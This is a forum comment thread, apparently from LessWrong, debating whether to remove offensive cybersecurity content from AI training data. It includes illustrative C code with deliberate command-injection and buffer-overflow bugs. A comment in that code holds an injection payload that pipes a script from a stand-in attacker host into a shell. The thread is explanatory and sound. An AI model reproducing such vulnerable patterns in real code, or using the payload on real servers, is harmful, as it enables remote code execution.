I appreciate the concreteness of your proposal.
Excluding cybersecurity information means that the model will write insecure code. To the extent that the model writes substantial amounts of internet-facing code that is not subsequently reviewed by a security-conscious person, insecure code will end up deployed. And deploying internet-facing code with certain classes of vulnerability (e.g. RCE) amounts to handing free computing resources to botnets.
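To make this concrete, here is a minimal hypothetical sketch (my own illustration, not something from the post) of the sort of internet-facing code such a model might emit, where unsanitized client input reaches a shell and becomes an RCE:

```c
/* Hypothetical sketch: a CGI-style handler that builds a shell command
 * from untrusted client input. Passing user data to system() like this
 * is a classic remote-code-execution (RCE) pattern. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    /* QUERY_STRING comes from the remote client, e.g. "file=report.txt" */
    const char *query = getenv("QUERY_STRING");
    if (query == NULL || strncmp(query, "file=", 5) != 0) {
        printf("Status: 400 Bad Request\r\n\r\n");
        return 1;
    }

    char cmd[512];
    /* BUG: the client-controlled filename is interpolated into a shell
     * command. A request like "file=x;curl evil.example|sh" runs
     * arbitrary commands on the server. */
    snprintf(cmd, sizeof(cmd), "cat /var/www/files/%s", query + 5);

    printf("Content-Type: text/plain\r\n\r\n");
    fflush(stdout);
    system(cmd);   /* attacker-controlled shell invocation */
    return 0;
}
```

The fix is to avoid the shell entirely (validate the filename and open the file directly), which is exactly the kind of security awareness at stake.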
In the best-case scenario, the model will know what it does not know, and will warn users that it cannot write secure code and that, if they need secure code, they should use tools that can support that (such as already-existing LLMs that do have information about writing secure code in their training data); and the users will actually heed the warnings rather than going “it’ll probably be fine, the warning doesn’t apply to me because I’m in a hurry”. I don’t expect that we’d get the best-case scenario.
An even more extreme approach, not training the model on code at all, would prevent the particular model in question from having dangerous programming-related capabilities, and would also avoid the failure mode where the model appears to solve the user’s problem but does so in a way that causes issues for that user and has negative externalities later on down the road.
I expect that there’s a similar thing going on with biological stuff and lab safety guidelines.
Thanks for the feedback! Upvoted, but disagreed.
I agree that not knowing anything at all about cybersecurity might cause the model to write less secure code (though it is not obvious that the inclusion of unsafe code examples doesn’t in fact lead to more unsafe code being emitted, but let’s put that aside).
However, writing safe code requires quite different knowledge from offensive cybersecurity. For writing safe code, it is relevant to know about common vulnerabilities (which are often just normal bugs) and how to avoid them; I agree that this information probably should be kept in the dataset (at least for code-completion models, which are not necessarily all models). Most other examples I gave are irrelevant. For instance, exploit mitigations (such as ASLR, CFG, and the rest that I listed in the post) are completely transparent to developers and are implemented by the compiler and operating system, and exploit techniques (such as ROP, …) are completely irrelevant to developers. For another example, knowing about the specific vulnerabilities that were found in the past few years is irrelevant to writing safe code, but does open the gate to one-day exploitation (one might argue that, due to sample efficiency, models do need that, but I think the effect will be insignificant; I can elaborate if anyone is interested).
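To illustrate the distinction with a minimal hypothetical sketch of my own: the knowledge that matters for writing safe code is how to avoid ordinary bugs like the one below, and the fix involves none of the exploitation machinery (ASLR, CFG, ROP, and so on):

```c
/* Hypothetical sketch: a "common vulnerability that is just a normal bug"
 * and its fix. Neither writing nor fixing it requires knowing anything
 * about ASLR, CFG, ROP, or other exploit machinery. */
#include <stdio.h>
#include <string.h>

/* Vulnerable: no bounds check, so a long name overflows the buffer. */
void greet_unsafe(const char *name) {
    char buf[32];
    strcpy(buf, name);            /* classic stack buffer overflow */
    printf("Hello, %s\n", buf);
}

/* Fixed: the same logic with an explicit size limit. */
void greet_safe(const char *name) {
    char buf[32];
    snprintf(buf, sizeof(buf), "%s", name);  /* truncates instead of overflowing */
    printf("Hello, %s\n", buf);
}

int main(int argc, char **argv) {
    const char *name = (argc > 1) ? argv[1] : "world";
    greet_safe(name);
    return 0;
}
```

The mitigations exist to make bugs like `greet_unsafe` harder to exploit, but the developer-facing fix is just bounds checking.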
I don’t know enough about biorisks to comment on the situation there. I would be surprised if techniques that are particularly relevant for developing deadly pathogens were relevant to a non-negligible fraction of biology research. Of course, there would be some overlap (just as for cybersecurity you have to be able to code at all), but I’d argue that a big fraction doesn’t overlap significantly.
For future reference, there are benchmarks for safe code that could be used to assess this issue, such as Purple Llama CyberSecEval by Meta.
(Note: this paper contains two different tests. First, a benchmark for writing safe code, which I didn’t check and can’t vouch for, but which seems like a useful entry point. Second, a test of model alignment towards not complying with requests for cyberattack tools, which I don’t think is too relevant to the OP.)